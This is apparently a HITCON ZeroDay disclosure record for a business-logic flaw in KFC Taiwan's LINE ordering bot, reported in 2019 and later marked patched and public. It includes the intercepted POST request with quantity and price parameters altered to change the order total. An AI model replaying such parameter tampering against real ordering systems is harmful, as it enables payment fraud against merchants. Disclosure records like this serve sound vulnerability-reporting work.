台灣肯德基KFC TaiwanLINE BOT 訂餐付款漏洞

Vulnerability Overview

ZDID: ZD-2019-00222
發信 Vendor: 台灣肯德基
Title: 台灣肯德基KFC TaiwanLINE BOT 訂餐付款漏洞
Introduction: 可繞過前端驗證修改套餐數量改變購物車金額，並成功建立訂單。

處理狀態

目前狀態

公開

Last Update : 2019/04/19

新提交
已審核
已通報
已修補
未複測
公開

處理歷程

2019/03/08 01:28:21 : 新提交 (由 $7 更新此狀態)
2019/03/08 22:17:26 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2019/03/11 11:32:03 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2019/03/11 11:32:03 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2019/03/11 11:32:04 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2019/03/12 11:08:52 : 修補中 (由組織帳號更新此狀態)
2019/03/13 17:33:41 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2019/04/01 15:41:37 : 複測申請中 (由組織帳號更新此狀態)
2019/04/19 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2019-00222
通報者：seveny100 ($7)
風險：中
類型：邏輯漏洞 (Logic Flaws)

參考資料

攻擊者可經由該漏洞繞過網站邏輯行為進行惡意攻擊。

漏洞說明： OWASP - Testing for business logic
https://www.owasp.org/index.php/Testing_for_business_logic

漏洞說明： CWE-840: Business Logic Errors
https://cwe.mitre.org/data/definitions/840.html

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

1.隨意點餐
2.攔截此端點請求
並將AddItem[0][Qty]隨意修改

POST https://techatbot-kfc.3rdchannel.com.tw/Order/ProductItemDetail/ProductItemDetail/AddShoppingCar?OrderKeyID=xxxxxxxxxx&isEdit=False HTTP/1.1

MainProductID=AA176&MainQty=1&Total=969&CouponID=&CouponType=&AccumulateAmount=true&ProductMainType=Product&AddItem%5B0%5D%5BProductID%5D=NF01&AddItem%5B0%5D%5BQty%5D=16&AddItem%5B0%5D%5BPrice%5D=0&AddItem%5B1%5D%5BProductID%5D=NF02&AddItem%5B1%5D%5BQty%5D=16&AddItem%5B1%5D%5BPrice%5D=0&AddItem%5B2%5D%5BProductID%5D=NF04&AddItem%5B2%5D%5BQty%5D=16&AddItem%5B2%5D%5BPrice%5D=0&AddItem%5B3%5D%5BProductID%5D=JG01&AddItem%5B3%5D%5BQty%5D=16&AddItem%5B3%5D%5BPrice%5D=0&AddItem%5B4%5D%5BProductID%5D=EB01&AddItem%5B4%5D%5BQty%5D=16&AddItem%5B4%5D%5BPrice%5D=0&AddItem%5B5%5D%5BProductID%5D=HF01&AddItem%5B5%5D%5BQty%5D=16&AddItem%5B5%5D%5BPrice%5D=0